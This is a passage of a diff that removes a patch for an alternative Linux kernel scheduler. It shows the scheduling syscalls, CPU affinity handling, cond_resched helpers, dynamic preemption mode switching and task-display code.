-+		.sched_policy = SCHED_NORMAL,
-+		.sched_nice = nice,
-+	};
-+	WARN_ON_ONCE(sched_setattr_nocheck(p, &attr) != 0);
-+}
-+EXPORT_SYMBOL_GPL(sched_set_normal);
-+
-+static int
-+do_sched_setscheduler(pid_t pid, int policy, struct sched_param __user *param)
-+{
-+	struct sched_param lparam;
-+	struct task_struct *p;
-+	int retval;
-+
-+	if (!param || pid < 0)
-+		return -EINVAL;
-+	if (copy_from_user(&lparam, param, sizeof(struct sched_param)))
-+		return -EFAULT;
-+
-+	rcu_read_lock();
-+	retval = -ESRCH;
-+	p = find_process_by_pid(pid);
-+	if (likely(p))
-+		get_task_struct(p);
-+	rcu_read_unlock();
-+
-+	if (likely(p)) {
-+		retval = sched_setscheduler(p, policy, &lparam);
-+		put_task_struct(p);
-+	}
-+
-+	return retval;
-+}
-+
-+/*
-+ * Mimics kernel/events/core.c perf_copy_attr().
-+ */
-+static int sched_copy_attr(struct sched_attr __user *uattr, struct sched_attr *attr)
-+{
-+	u32 size;
-+	int ret;
-+
-+	/* Zero the full structure, so that a short copy will be nice: */
-+	memset(attr, 0, sizeof(*attr));
-+
-+	ret = get_user(size, &uattr->size);
-+	if (ret)
-+		return ret;
-+
-+	/* ABI compatibility quirk: */
-+	if (!size)
-+		size = SCHED_ATTR_SIZE_VER0;
-+
-+	if (size < SCHED_ATTR_SIZE_VER0 || size > PAGE_SIZE)
-+		goto err_size;
-+
-+	ret = copy_struct_from_user(attr, sizeof(*attr), uattr, size);
-+	if (ret) {
-+		if (ret == -E2BIG)
-+			goto err_size;
-+		return ret;
-+	}
-+
-+	/*
-+	 * XXX: Do we want to be lenient like existing syscalls; or do we want
-+	 * to be strict and return an error on out-of-bounds values?
-+	 */
-+	attr->sched_nice = clamp(attr->sched_nice, -20, 19);
-+
-+	/* sched/core.c uses zero here but we already know ret is zero */
-+	return 0;
-+
-+err_size:
-+	put_user(sizeof(*attr), &uattr->size);
-+	return -E2BIG;
-+}
-+
-+/**
-+ * sys_sched_setscheduler - set/change the scheduler policy and RT priority
-+ * @pid: the pid in question.
-+ * @policy: new policy.
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ * @param: structure containing the new RT priority.
-+ */
-+SYSCALL_DEFINE3(sched_setscheduler, pid_t, pid, int, policy, struct sched_param __user *, param)
-+{
-+	if (policy < 0)
-+		return -EINVAL;
-+
-+	return do_sched_setscheduler(pid, policy, param);
-+}
-+
-+/**
-+ * sys_sched_setparam - set/change the RT priority of a thread
-+ * @pid: the pid in question.
-+ * @param: structure containing the new RT priority.
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ */
-+SYSCALL_DEFINE2(sched_setparam, pid_t, pid, struct sched_param __user *, param)
-+{
-+	return do_sched_setscheduler(pid, SETPARAM_POLICY, param);
-+}
-+
-+/**
-+ * sys_sched_setattr - same as above, but with extended sched_attr
-+ * @pid: the pid in question.
-+ * @uattr: structure containing the extended parameters.
-+ */
-+SYSCALL_DEFINE3(sched_setattr, pid_t, pid, struct sched_attr __user *, uattr,
-+			       unsigned int, flags)
-+{
-+	struct sched_attr attr;
-+	struct task_struct *p;
-+	int retval;
-+
-+	if (!uattr || pid < 0 || flags)
-+		return -EINVAL;
-+
-+	retval = sched_copy_attr(uattr, &attr);
-+	if (retval)
-+		return retval;
-+
-+	if ((int)attr.sched_policy < 0)
-+		return -EINVAL;
-+
-+	rcu_read_lock();
-+	retval = -ESRCH;
-+	p = find_process_by_pid(pid);
-+	if (likely(p))
-+		get_task_struct(p);
-+	rcu_read_unlock();
-+
-+	if (likely(p)) {
-+		retval = sched_setattr(p, &attr);
-+		put_task_struct(p);
-+	}
-+
-+	return retval;
-+}
-+
-+/**
-+ * sys_sched_getscheduler - get the policy (scheduling class) of a thread
-+ * @pid: the pid in question.
-+ *
-+ * Return: On success, the policy of the thread. Otherwise, a negative error
-+ * code.
-+ */
-+SYSCALL_DEFINE1(sched_getscheduler, pid_t, pid)
-+{
-+	struct task_struct *p;
-+	int retval = -EINVAL;
-+
-+	if (pid < 0)
-+		goto out_nounlock;
-+
-+	retval = -ESRCH;
-+	rcu_read_lock();
-+	p = find_process_by_pid(pid);
-+	if (p) {
-+		retval = security_task_getscheduler(p);
-+		if (!retval)
-+			retval = p->policy;
-+	}
-+	rcu_read_unlock();
-+
-+out_nounlock:
-+	return retval;
-+}
-+
-+/**
-+ * sys_sched_getscheduler - get the RT priority of a thread
-+ * @pid: the pid in question.
-+ * @param: structure containing the RT priority.
-+ *
-+ * Return: On success, 0 and the RT priority is in @param. Otherwise, an error
-+ * code.
-+ */
-+SYSCALL_DEFINE2(sched_getparam, pid_t, pid, struct sched_param __user *, param)
-+{
-+	struct sched_param lp = { .sched_priority = 0 };
-+	struct task_struct *p;
-+	int retval = -EINVAL;
-+
-+	if (!param || pid < 0)
-+		goto out_nounlock;
-+
-+	rcu_read_lock();
-+	p = find_process_by_pid(pid);
-+	retval = -ESRCH;
-+	if (!p)
-+		goto out_unlock;
-+
-+	retval = security_task_getscheduler(p);
-+	if (retval)
-+		goto out_unlock;
-+
-+	if (task_has_rt_policy(p))
-+		lp.sched_priority = p->rt_priority;
-+	rcu_read_unlock();
-+
-+	/*
-+	 * This one might sleep, we cannot do it with a spinlock held ...
-+	 */
-+	retval = copy_to_user(param, &lp, sizeof(*param)) ? -EFAULT : 0;
-+
-+out_nounlock:
-+	return retval;
-+
-+out_unlock:
-+	rcu_read_unlock();
-+	return retval;
-+}
-+
-+/*
-+ * Copy the kernel size attribute structure (which might be larger
-+ * than what user-space knows about) to user-space.
-+ *
-+ * Note that all cases are valid: user-space buffer can be larger or
-+ * smaller than the kernel-space buffer. The usual case is that both
-+ * have the same size.
-+ */
-+static int
-+sched_attr_copy_to_user(struct sched_attr __user *uattr,
-+			struct sched_attr *kattr,
-+			unsigned int usize)
-+{
-+	unsigned int ksize = sizeof(*kattr);
-+
-+	if (!access_ok(uattr, usize))
-+		return -EFAULT;
-+
-+	/*
-+	 * sched_getattr() ABI forwards and backwards compatibility:
-+	 *
-+	 * If usize == ksize then we just copy everything to user-space and all is good.
-+	 *
-+	 * If usize < ksize then we only copy as much as user-space has space for,
-+	 * this keeps ABI compatibility as well. We skip the rest.
-+	 *
-+	 * If usize > ksize then user-space is using a newer version of the ABI,
-+	 * which part the kernel doesn't know about. Just ignore it - tooling can
-+	 * detect the kernel's knowledge of attributes from the attr->size value
-+	 * which is set to ksize in this case.
-+	 */
-+	kattr->size = min(usize, ksize);
-+
-+	if (copy_to_user(uattr, kattr, kattr->size))
-+		return -EFAULT;
-+
-+	return 0;
-+}
-+
-+/**
-+ * sys_sched_getattr - similar to sched_getparam, but with sched_attr
-+ * @pid: the pid in question.
-+ * @uattr: structure containing the extended parameters.
-+ * @usize: sizeof(attr) for fwd/bwd comp.
-+ * @flags: for future extension.
-+ */
-+SYSCALL_DEFINE4(sched_getattr, pid_t, pid, struct sched_attr __user *, uattr,
-+		unsigned int, usize, unsigned int, flags)
-+{
-+	struct sched_attr kattr = { };
-+	struct task_struct *p;
-+	int retval;
-+
-+	if (!uattr || pid < 0 || usize > PAGE_SIZE ||
-+	    usize < SCHED_ATTR_SIZE_VER0 || flags)
-+		return -EINVAL;
-+
-+	rcu_read_lock();
-+	p = find_process_by_pid(pid);
-+	retval = -ESRCH;
-+	if (!p)
-+		goto out_unlock;
-+
-+	retval = security_task_getscheduler(p);
-+	if (retval)
-+		goto out_unlock;
-+
-+	kattr.sched_policy = p->policy;
-+	if (p->sched_reset_on_fork)
-+		kattr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
-+	if (task_has_rt_policy(p))
-+		kattr.sched_priority = p->rt_priority;
-+	else
-+		kattr.sched_nice = task_nice(p);
-+	kattr.sched_flags &= SCHED_FLAG_ALL;
-+
-+#ifdef CONFIG_UCLAMP_TASK
-+	kattr.sched_util_min = p->uclamp_req[UCLAMP_MIN].value;
-+	kattr.sched_util_max = p->uclamp_req[UCLAMP_MAX].value;
-+#endif
-+
-+	rcu_read_unlock();
-+
-+	return sched_attr_copy_to_user(uattr, &kattr, usize);
-+
-+out_unlock:
-+	rcu_read_unlock();
-+	return retval;
-+}
-+
-+#ifdef CONFIG_SMP
-+int dl_task_check_affinity(struct task_struct *p, const struct cpumask *mask)
-+{
-+	return 0;
-+}
-+#endif
-+
-+static int
-+__sched_setaffinity(struct task_struct *p, const struct cpumask *mask)
-+{
-+	int retval;
-+	cpumask_var_t cpus_allowed, new_mask;
-+
-+	if (!alloc_cpumask_var(&cpus_allowed, GFP_KERNEL))
-+		return -ENOMEM;
-+
-+	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL)) {
-+		retval = -ENOMEM;
-+		goto out_free_cpus_allowed;
-+	}
-+
-+	cpuset_cpus_allowed(p, cpus_allowed);
-+	cpumask_and(new_mask, mask, cpus_allowed);
-+again:
-+	retval = __set_cpus_allowed_ptr(p, new_mask, SCA_CHECK | SCA_USER);
-+	if (retval)
-+		goto out_free_new_mask;
-+
-+	cpuset_cpus_allowed(p, cpus_allowed);
-+	if (!cpumask_subset(new_mask, cpus_allowed)) {
-+		/*
-+		 * We must have raced with a concurrent cpuset
-+		 * update. Just reset the cpus_allowed to the
-+		 * cpuset's cpus_allowed
-+		 */
-+		cpumask_copy(new_mask, cpus_allowed);
-+		goto again;
-+	}
-+
-+out_free_new_mask:
-+	free_cpumask_var(new_mask);
-+out_free_cpus_allowed:
-+	free_cpumask_var(cpus_allowed);
-+	return retval;
-+}
-+
-+long sched_setaffinity(pid_t pid, const struct cpumask *in_mask)
-+{
-+	struct task_struct *p;
-+	int retval;
-+
-+	rcu_read_lock();
-+
-+	p = find_process_by_pid(pid);
-+	if (!p) {
-+		rcu_read_unlock();
-+		return -ESRCH;
-+	}
-+
-+	/* Prevent p going away */
-+	get_task_struct(p);
-+	rcu_read_unlock();
-+
-+	if (p->flags & PF_NO_SETAFFINITY) {
-+		retval = -EINVAL;
-+		goto out_put_task;
-+	}
-+
-+	if (!check_same_owner(p)) {
-+		rcu_read_lock();
-+		if (!ns_capable(__task_cred(p)->user_ns, CAP_SYS_NICE)) {
-+			rcu_read_unlock();
-+			retval = -EPERM;
-+			goto out_put_task;
-+		}
-+		rcu_read_unlock();
-+	}
-+
-+	retval = security_task_setscheduler(p);
-+	if (retval)
-+		goto out_put_task;
-+
-+	retval = __sched_setaffinity(p, in_mask);
-+out_put_task:
-+	put_task_struct(p);
-+	return retval;
-+}
-+
-+static int get_user_cpu_mask(unsigned long __user *user_mask_ptr, unsigned len,
-+			     struct cpumask *new_mask)
-+{
-+	if (len < cpumask_size())
-+		cpumask_clear(new_mask);
-+	else if (len > cpumask_size())
-+		len = cpumask_size();
-+
-+	return copy_from_user(new_mask, user_mask_ptr, len) ? -EFAULT : 0;
-+}
-+
-+/**
-+ * sys_sched_setaffinity - set the CPU affinity of a process
-+ * @pid: pid of the process
-+ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
-+ * @user_mask_ptr: user-space pointer to the new CPU mask
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ */
-+SYSCALL_DEFINE3(sched_setaffinity, pid_t, pid, unsigned int, len,
-+		unsigned long __user *, user_mask_ptr)
-+{
-+	cpumask_var_t new_mask;
-+	int retval;
-+
-+	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL))
-+		return -ENOMEM;
-+
-+	retval = get_user_cpu_mask(user_mask_ptr, len, new_mask);
-+	if (retval == 0)
-+		retval = sched_setaffinity(pid, new_mask);
-+	free_cpumask_var(new_mask);
-+	return retval;
-+}
-+
-+long sched_getaffinity(pid_t pid, cpumask_t *mask)
-+{
-+	struct task_struct *p;
-+	raw_spinlock_t *lock;
-+	unsigned long flags;
-+	int retval;
-+
-+	rcu_read_lock();
-+
-+	retval = -ESRCH;
-+	p = find_process_by_pid(pid);
-+	if (!p)
-+		goto out_unlock;
-+
-+	retval = security_task_getscheduler(p);
-+	if (retval)
-+		goto out_unlock;
-+
-+	task_access_lock_irqsave(p, &lock, &flags);
-+	cpumask_and(mask, &p->cpus_mask, cpu_active_mask);
-+	task_access_unlock_irqrestore(p, lock, &flags);
-+
-+out_unlock:
-+	rcu_read_unlock();
-+
-+	return retval;
-+}
-+
-+/**
-+ * sys_sched_getaffinity - get the CPU affinity of a process
-+ * @pid: pid of the process
-+ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
-+ * @user_mask_ptr: user-space pointer to hold the current CPU mask
-+ *
-+ * Return: size of CPU mask copied to user_mask_ptr on success. An
-+ * error code otherwise.
-+ */
-+SYSCALL_DEFINE3(sched_getaffinity, pid_t, pid, unsigned int, len,
-+		unsigned long __user *, user_mask_ptr)
-+{
-+	int ret;
-+	cpumask_var_t mask;
-+
-+	if ((len * BITS_PER_BYTE) < nr_cpu_ids)
-+		return -EINVAL;
-+	if (len & (sizeof(unsigned long)-1))
-+		return -EINVAL;
-+
-+	if (!alloc_cpumask_var(&mask, GFP_KERNEL))
-+		return -ENOMEM;
-+
-+	ret = sched_getaffinity(pid, mask);
-+	if (ret == 0) {
-+		unsigned int retlen = min_t(size_t, len, cpumask_size());
-+
-+		if (copy_to_user(user_mask_ptr, mask, retlen))
-+			ret = -EFAULT;
-+		else
-+			ret = retlen;
-+	}
-+	free_cpumask_var(mask);
-+
-+	return ret;
-+}
-+
-+static void do_sched_yield(void)
-+{
-+	struct rq *rq;
-+	struct rq_flags rf;
-+
-+	if (!sched_yield_type)
-+		return;
-+
-+	rq = this_rq_lock_irq(&rf);
-+
-+	schedstat_inc(rq->yld_count);
-+
-+	if (1 == sched_yield_type) {
-+		if (!rt_task(current))
-+			do_sched_yield_type_1(current, rq);
-+	} else if (2 == sched_yield_type) {
-+		if (rq->nr_running > 1)
-+			rq->skip = current;
-+	}
-+
-+	preempt_disable();
-+	raw_spin_unlock_irq(&rq->lock);
-+	sched_preempt_enable_no_resched();
-+
-+	schedule();
-+}
-+
-+/**
-+ * sys_sched_yield - yield the current processor to other threads.
-+ *
-+ * This function yields the current CPU to other tasks. If there are no
-+ * other threads running on this CPU then this function will return.
-+ *
-+ * Return: 0.
-+ */
-+SYSCALL_DEFINE0(sched_yield)
-+{
-+	do_sched_yield();
-+	return 0;
-+}
-+
-+#if !defined(CONFIG_PREEMPTION) || defined(CONFIG_PREEMPT_DYNAMIC)
-+int __sched __cond_resched(void)
-+{
-+	if (should_resched(0)) {
-+		preempt_schedule_common();
-+		return 1;
-+	}
-+	/*
-+	 * In preemptible kernels, ->rcu_read_lock_nesting tells the tick
-+	 * whether the current CPU is in an RCU read-side critical section,
-+	 * so the tick can report quiescent states even for CPUs looping
-+	 * in kernel context.  In contrast, in non-preemptible kernels,
-+	 * RCU readers leave no in-memory hints, which means that CPU-bound
-+	 * processes executing in kernel context might never report an
-+	 * RCU quiescent state.  Therefore, the following code causes
-+	 * cond_resched() to report a quiescent state, but only when RCU
-+	 * is in urgent need of one.
-+	 */
-+#ifndef CONFIG_PREEMPT_RCU
-+	rcu_all_qs();
-+#endif
-+	return 0;
-+}
-+EXPORT_SYMBOL(__cond_resched);
-+#endif
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
-+#define cond_resched_dynamic_enabled	__cond_resched
-+#define cond_resched_dynamic_disabled	((void *)&__static_call_return0)
-+DEFINE_STATIC_CALL_RET0(cond_resched, __cond_resched);
-+EXPORT_STATIC_CALL_TRAMP(cond_resched);
-+
-+#define might_resched_dynamic_enabled	__cond_resched
-+#define might_resched_dynamic_disabled	((void *)&__static_call_return0)
-+DEFINE_STATIC_CALL_RET0(might_resched, __cond_resched);
-+EXPORT_STATIC_CALL_TRAMP(might_resched);
-+#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
-+static DEFINE_STATIC_KEY_FALSE(sk_dynamic_cond_resched);
-+int __sched dynamic_cond_resched(void)
-+{
-+	if (!static_branch_unlikely(&sk_dynamic_cond_resched))
-+		return 0;
-+	return __cond_resched();
-+}
-+EXPORT_SYMBOL(dynamic_cond_resched);
-+
-+static DEFINE_STATIC_KEY_FALSE(sk_dynamic_might_resched);
-+int __sched dynamic_might_resched(void)
-+{
-+	if (!static_branch_unlikely(&sk_dynamic_might_resched))
-+		return 0;
-+	return __cond_resched();
-+}
-+EXPORT_SYMBOL(dynamic_might_resched);
-+#endif
-+#endif
-+
-+/*
-+ * __cond_resched_lock() - if a reschedule is pending, drop the given lock,
-+ * call schedule, and on return reacquire the lock.
-+ *
-+ * This works OK both with and without CONFIG_PREEMPTION.  We do strange low-level
-+ * operations here to prevent schedule() from being called twice (once via
-+ * spin_unlock(), once by hand).
-+ */
-+int __cond_resched_lock(spinlock_t *lock)
-+{
-+	int resched = should_resched(PREEMPT_LOCK_OFFSET);
-+	int ret = 0;
-+
-+	lockdep_assert_held(lock);
-+
-+	if (spin_needbreak(lock) || resched) {
-+		spin_unlock(lock);
-+		if (!_cond_resched())
-+			cpu_relax();
-+		ret = 1;
-+		spin_lock(lock);
-+	}
-+	return ret;
-+}
-+EXPORT_SYMBOL(__cond_resched_lock);
-+
-+int __cond_resched_rwlock_read(rwlock_t *lock)
-+{
-+	int resched = should_resched(PREEMPT_LOCK_OFFSET);
-+	int ret = 0;
-+
-+	lockdep_assert_held_read(lock);
-+
-+	if (rwlock_needbreak(lock) || resched) {
-+		read_unlock(lock);
-+		if (!_cond_resched())
-+			cpu_relax();
-+		ret = 1;
-+		read_lock(lock);
-+	}
-+	return ret;
-+}
-+EXPORT_SYMBOL(__cond_resched_rwlock_read);
-+
-+int __cond_resched_rwlock_write(rwlock_t *lock)
-+{
-+	int resched = should_resched(PREEMPT_LOCK_OFFSET);
-+	int ret = 0;
-+
-+	lockdep_assert_held_write(lock);
-+
-+	if (rwlock_needbreak(lock) || resched) {
-+		write_unlock(lock);
-+		if (!_cond_resched())
-+			cpu_relax();
-+		ret = 1;
-+		write_lock(lock);
-+	}
-+	return ret;
-+}
-+EXPORT_SYMBOL(__cond_resched_rwlock_write);
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+
-+#ifdef CONFIG_GENERIC_ENTRY
-+#include <linux/entry-common.h>
-+#endif
-+
-+/*
-+ * SC:cond_resched
-+ * SC:might_resched
-+ * SC:preempt_schedule
-+ * SC:preempt_schedule_notrace
-+ * SC:irqentry_exit_cond_resched
-+ *
-+ *
-+ * NONE:
-+ *   cond_resched               <- __cond_resched
-+ *   might_resched              <- RET0
-+ *   preempt_schedule           <- NOP
-+ *   preempt_schedule_notrace   <- NOP
-+ *   irqentry_exit_cond_resched <- NOP
-+ *
-+ * VOLUNTARY:
-+ *   cond_resched               <- __cond_resched
-+ *   might_resched              <- __cond_resched
-+ *   preempt_schedule           <- NOP
-+ *   preempt_schedule_notrace   <- NOP
-+ *   irqentry_exit_cond_resched <- NOP
-+ *
-+ * FULL:
-+ *   cond_resched               <- RET0
-+ *   might_resched              <- RET0
-+ *   preempt_schedule           <- preempt_schedule
-+ *   preempt_schedule_notrace   <- preempt_schedule_notrace
-+ *   irqentry_exit_cond_resched <- irqentry_exit_cond_resched
-+ */
-+
-+enum {
-+	preempt_dynamic_undefined = -1,
-+	preempt_dynamic_none,
-+	preempt_dynamic_voluntary,
-+	preempt_dynamic_full,
-+};
-+
-+int preempt_dynamic_mode = preempt_dynamic_undefined;
-+
-+int sched_dynamic_mode(const char *str)
-+{
-+	if (!strcmp(str, "none"))
-+		return preempt_dynamic_none;
-+
-+	if (!strcmp(str, "voluntary"))
-+		return preempt_dynamic_voluntary;
-+
-+	if (!strcmp(str, "full"))
-+		return preempt_dynamic_full;
-+
-+	return -EINVAL;
-+}
-+
-+#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
-+#define preempt_dynamic_enable(f)	static_call_update(f, f##_dynamic_enabled)
-+#define preempt_dynamic_disable(f)	static_call_update(f, f##_dynamic_disabled)
-+#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
-+#define preempt_dynamic_enable(f)	static_key_enable(&sk_dynamic_##f.key)
-+#define preempt_dynamic_disable(f)	static_key_disable(&sk_dynamic_##f.key)
-+#else
-+#error "Unsupported PREEMPT_DYNAMIC mechanism"
-+#endif
-+
-+void sched_dynamic_update(int mode)
-+{
-+	/*
-+	 * Avoid {NONE,VOLUNTARY} -> FULL transitions from ever ending up in
-+	 * the ZERO state, which is invalid.
-+	 */
-+	preempt_dynamic_enable(cond_resched);
-+	preempt_dynamic_enable(might_resched);
-+	preempt_dynamic_enable(preempt_schedule);
-+	preempt_dynamic_enable(preempt_schedule_notrace);
-+	preempt_dynamic_enable(irqentry_exit_cond_resched);
-+
-+	switch (mode) {
-+	case preempt_dynamic_none:
-+		preempt_dynamic_enable(cond_resched);
-+		preempt_dynamic_disable(might_resched);
-+		preempt_dynamic_disable(preempt_schedule);
-+		preempt_dynamic_disable(preempt_schedule_notrace);
-+		preempt_dynamic_disable(irqentry_exit_cond_resched);
-+		pr_info("Dynamic Preempt: none\n");
-+		break;
-+
-+	case preempt_dynamic_voluntary:
-+		preempt_dynamic_enable(cond_resched);
-+		preempt_dynamic_enable(might_resched);
-+		preempt_dynamic_disable(preempt_schedule);
-+		preempt_dynamic_disable(preempt_schedule_notrace);
-+		preempt_dynamic_disable(irqentry_exit_cond_resched);
-+		pr_info("Dynamic Preempt: voluntary\n");
-+		break;
-+
-+	case preempt_dynamic_full:
-+		preempt_dynamic_disable(cond_resched);
-+		preempt_dynamic_disable(might_resched);
-+		preempt_dynamic_enable(preempt_schedule);
-+		preempt_dynamic_enable(preempt_schedule_notrace);
-+		preempt_dynamic_enable(irqentry_exit_cond_resched);
-+		pr_info("Dynamic Preempt: full\n");
-+		break;
-+	}
-+
-+	preempt_dynamic_mode = mode;
-+}
-+
-+static int __init setup_preempt_mode(char *str)
-+{
-+	int mode = sched_dynamic_mode(str);
-+	if (mode < 0) {
-+		pr_warn("Dynamic Preempt: unsupported mode: %s\n", str);
-+		return 0;
-+	}
-+
-+	sched_dynamic_update(mode);
-+	return 1;
-+}
-+__setup("preempt=", setup_preempt_mode);
-+
-+static void __init preempt_dynamic_init(void)
-+{
-+	if (preempt_dynamic_mode == preempt_dynamic_undefined) {
-+		if (IS_ENABLED(CONFIG_PREEMPT_NONE)) {
-+			sched_dynamic_update(preempt_dynamic_none);
-+		} else if (IS_ENABLED(CONFIG_PREEMPT_VOLUNTARY)) {
-+			sched_dynamic_update(preempt_dynamic_voluntary);
-+		} else {
-+			/* Default static call setting, nothing to do */
-+			WARN_ON_ONCE(!IS_ENABLED(CONFIG_PREEMPT));
-+			preempt_dynamic_mode = preempt_dynamic_full;
-+			pr_info("Dynamic Preempt: full\n");
-+		}
-+	}
-+}
-+
-+#define PREEMPT_MODEL_ACCESSOR(mode) \
-+	bool preempt_model_##mode(void)						 \
-+	{									 \
-+		WARN_ON_ONCE(preempt_dynamic_mode == preempt_dynamic_undefined); \
-+		return preempt_dynamic_mode == preempt_dynamic_##mode;		 \
-+	}									 \
-+	EXPORT_SYMBOL_GPL(preempt_model_##mode)
-+
-+PREEMPT_MODEL_ACCESSOR(none);
-+PREEMPT_MODEL_ACCESSOR(voluntary);
-+PREEMPT_MODEL_ACCESSOR(full);
-+
-+#else /* !CONFIG_PREEMPT_DYNAMIC */
-+
-+static inline void preempt_dynamic_init(void) { }
-+
-+#endif /* #ifdef CONFIG_PREEMPT_DYNAMIC */
-+
-+/**
-+ * yield - yield the current processor to other threads.
-+ *
-+ * Do not ever use this function, there's a 99% chance you're doing it wrong.
-+ *
-+ * The scheduler is at all times free to pick the calling task as the most
-+ * eligible task to run, if removing the yield() call from your code breaks
-+ * it, it's already broken.
-+ *
-+ * Typical broken usage is:
-+ *
-+ * while (!event)
-+ * 	yield();
-+ *
-+ * where one assumes that yield() will let 'the other' process run that will
-+ * make event true. If the current task is a SCHED_FIFO task that will never
-+ * happen. Never use yield() as a progress guarantee!!
-+ *
-+ * If you want to use yield() to wait for something, use wait_event().
-+ * If you want to use yield() to be 'nice' for others, use cond_resched().
-+ * If you still want to use yield(), do not!
-+ */
-+void __sched yield(void)
-+{
-+	set_current_state(TASK_RUNNING);
-+	do_sched_yield();
-+}
-+EXPORT_SYMBOL(yield);
-+
-+/**
-+ * yield_to - yield the current processor to another thread in
-+ * your thread group, or accelerate that thread toward the
-+ * processor it's on.
-+ * @p: target task
-+ * @preempt: whether task preemption is allowed or not
-+ *
-+ * It's the caller's job to ensure that the target task struct
-+ * can't go away on us before we can do any checks.
-+ *
-+ * In Alt schedule FW, yield_to is not supported.
-+ *
-+ * Return:
-+ *	true (>0) if we indeed boosted the target task.
-+ *	false (0) if we failed to boost the target.
-+ *	-ESRCH if there's no task to yield to.
-+ */
-+int __sched yield_to(struct task_struct *p, bool preempt)
-+{
-+	return 0;
-+}
-+EXPORT_SYMBOL_GPL(yield_to);
-+
-+int io_schedule_prepare(void)
-+{
-+	int old_iowait = current->in_iowait;
-+
-+	current->in_iowait = 1;
-+	blk_flush_plug(current->plug, true);
-+	return old_iowait;
-+}
-+
-+void io_schedule_finish(int token)
-+{
-+	current->in_iowait = token;
-+}
-+
-+/*
-+ * This task is about to go to sleep on IO.  Increment rq->nr_iowait so
-+ * that process accounting knows that this is a task in IO wait state.
-+ *
-+ * But don't do that if it is a deliberate, throttling IO wait (this task
-+ * has set its backing_dev_info: the queue against which it should throttle)
-+ */
-+
-+long __sched io_schedule_timeout(long timeout)
-+{
-+	int token;
-+	long ret;
-+
-+	token = io_schedule_prepare();
-+	ret = schedule_timeout(timeout);
-+	io_schedule_finish(token);
-+
-+	return ret;
-+}
-+EXPORT_SYMBOL(io_schedule_timeout);
-+
-+void __sched io_schedule(void)
-+{
-+	int token;
-+
-+	token = io_schedule_prepare();
-+	schedule();
-+	io_schedule_finish(token);
-+}
-+EXPORT_SYMBOL(io_schedule);
-+
-+/**
-+ * sys_sched_get_priority_max - return maximum RT priority.
-+ * @policy: scheduling class.
-+ *
-+ * Return: On success, this syscall returns the maximum
-+ * rt_priority that can be used by a given scheduling class.
-+ * On failure, a negative error code is returned.
-+ */
-+SYSCALL_DEFINE1(sched_get_priority_max, int, policy)
-+{
-+	int ret = -EINVAL;
-+
-+	switch (policy) {
-+	case SCHED_FIFO:
-+	case SCHED_RR:
-+		ret = MAX_RT_PRIO - 1;
-+		break;
-+	case SCHED_NORMAL:
-+	case SCHED_BATCH:
-+	case SCHED_IDLE:
-+		ret = 0;
-+		break;
-+	}
-+	return ret;
-+}
-+
-+/**
-+ * sys_sched_get_priority_min - return minimum RT priority.
-+ * @policy: scheduling class.
-+ *
-+ * Return: On success, this syscall returns the minimum
-+ * rt_priority that can be used by a given scheduling class.
-+ * On failure, a negative error code is returned.
-+ */
-+SYSCALL_DEFINE1(sched_get_priority_min, int, policy)
-+{
-+	int ret = -EINVAL;
-+
-+	switch (policy) {
-+	case SCHED_FIFO:
-+	case SCHED_RR:
-+		ret = 1;
-+		break;
-+	case SCHED_NORMAL:
-+	case SCHED_BATCH:
-+	case SCHED_IDLE:
-+		ret = 0;
-+		break;
-+	}
-+	return ret;
-+}
-+
-+static int sched_rr_get_interval(pid_t pid, struct timespec64 *t)
-+{
-+	struct task_struct *p;
-+	int retval;
-+
-+	alt_sched_debug();
-+
-+	if (pid < 0)
-+		return -EINVAL;
-+
-+	retval = -ESRCH;
-+	rcu_read_lock();
-+	p = find_process_by_pid(pid);
-+	if (!p)
-+		goto out_unlock;
-+
-+	retval = security_task_getscheduler(p);
-+	if (retval)
-+		goto out_unlock;
-+	rcu_read_unlock();
-+
-+	*t = ns_to_timespec64(sched_timeslice_ns);
-+	return 0;
-+
-+out_unlock:
-+	rcu_read_unlock();
-+	return retval;
-+}
-+
-+/**
-+ * sys_sched_rr_get_interval - return the default timeslice of a process.
-+ * @pid: pid of the process.
-+ * @interval: userspace pointer to the timeslice value.
-+ *
-+ *
-+ * Return: On success, 0 and the timeslice is in @interval. Otherwise,
-+ * an error code.
-+ */
-+SYSCALL_DEFINE2(sched_rr_get_interval, pid_t, pid,
-+		struct __kernel_timespec __user *, interval)
-+{
-+	struct timespec64 t;
-+	int retval = sched_rr_get_interval(pid, &t);
-+
-+	if (retval == 0)
-+		retval = put_timespec64(&t, interval);
-+
-+	return retval;
-+}
-+
-+#ifdef CONFIG_COMPAT_32BIT_TIME
-+SYSCALL_DEFINE2(sched_rr_get_interval_time32, pid_t, pid,
-+		struct old_timespec32 __user *, interval)
-+{
-+	struct timespec64 t;
-+	int retval = sched_rr_get_interval(pid, &t);
-+
-+	if (retval == 0)
-+		retval = put_old_timespec32(&t, interval);
-+	return retval;
-+}
-+#endif
-+
-+void sched_show_task(struct task_struct *p)
-+{
-+	unsigned long free = 0;
-+	int ppid;
-+
-+	if (!try_get_task_stack(p))
-+		return;
-+
-+	pr_info("task:%-15.15s state:%c", p->comm, task_state_to_char(p));
-+
-+	if (task_is_running(p))
-+		pr_cont("  running task    ");
-+#ifdef CONFIG_DEBUG_STACK_USAGE
-+	free = stack_not_used(p);
-+#endif
-+	ppid = 0;
-+	rcu_read_lock();
-+	if (pid_alive(p))
-+		ppid = task_pid_nr(rcu_dereference(p->real_parent));
-+	rcu_read_unlock();
-+	pr_cont(" stack:%-5lu pid:%-5d ppid:%-6d flags:0x%08lx\n",
-+		free, task_pid_nr(p), ppid,
-+		read_task_thread_flags(p));
-+
-+	print_worker_info(KERN_INFO, p);
-+	print_stop_info(KERN_INFO, p);
-+	show_stack(p, NULL, KERN_INFO);
-+	put_task_stack(p);
-+}
-+EXPORT_SYMBOL_GPL(sched_show_task);
-+
-+static inline bool
-+state_filter_match(unsigned long state_filter, struct task_struct *p)
